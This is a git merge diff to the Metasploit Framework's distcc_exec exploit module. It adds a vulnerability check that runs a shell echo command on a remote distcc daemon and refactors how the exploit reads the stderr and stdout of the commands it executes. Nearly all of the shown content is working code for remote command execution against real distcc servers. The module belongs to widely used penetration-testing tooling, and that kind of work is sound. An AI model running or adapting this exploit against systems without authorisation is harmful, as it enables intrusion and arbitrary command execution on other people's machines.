Merge branch 'distcc-add-check' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-distcc-add-check

modules/exploits/unix/misc/distcc_exec.rb

@@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
 				], self.class)
 	end
 
+	def check
+		r = rand_text_alphanumeric(10)
+		connect
+		sock.put(dist_cmd("sh", "-c", "echo #{r}"))
+
+		dtag = rand_text_alphanumeric(10)
+		sock.put("DOTI0000000A#{dtag}\n")
+
+		err, out = read_output
+		if out.index(r)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
 	def exploit
 		connect
 
@@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		dtag = rand_text_alphanumeric(10)
 		sock.put("DOTI0000000A#{dtag}\n")
 
+		err, out = read_output
+
+		(err || "").split("\n") do |line|
+			print_status("stderr: #{line}")
+		end
+		(out || "").split("\n") do |line|
+			print_status("stdout: #{line}")
+		end
+
+		handler
+		disconnect
+	end
+
+	def read_output
+
 		res = sock.get_once(24, 5)
 
 		if !(res and res.length == 24)
@@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = sock.get_once(8, 5)
 		len = [res].pack("H*").unpack("N")[0]
 
-		return if not len
+		return [nil, nil] if not len
 		if (len > 0)
-			res = sock.get_once(len, 5)
+			err = sock.get_once(len, 5)
-			res.split("\n").each do |line|
-				print_status("stderr: #{line}")
-			end
 		end
 
 		# Check STDOUT
@@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = sock.get_once(8, 5)
 		len = [res].pack("H*").unpack("N")[0]
 
-		return if not len
+		return [err, nil] if not len
 		if (len > 0)
-			res = sock.get_once(len, 5)
+			out = sock.get_once(len, 5)
-			res.split("\n").each do |line|
-				print_status("stdout: #{line}")
-			end
 		end
+		return [err, out]
 
-		handler
-		disconnect
 	end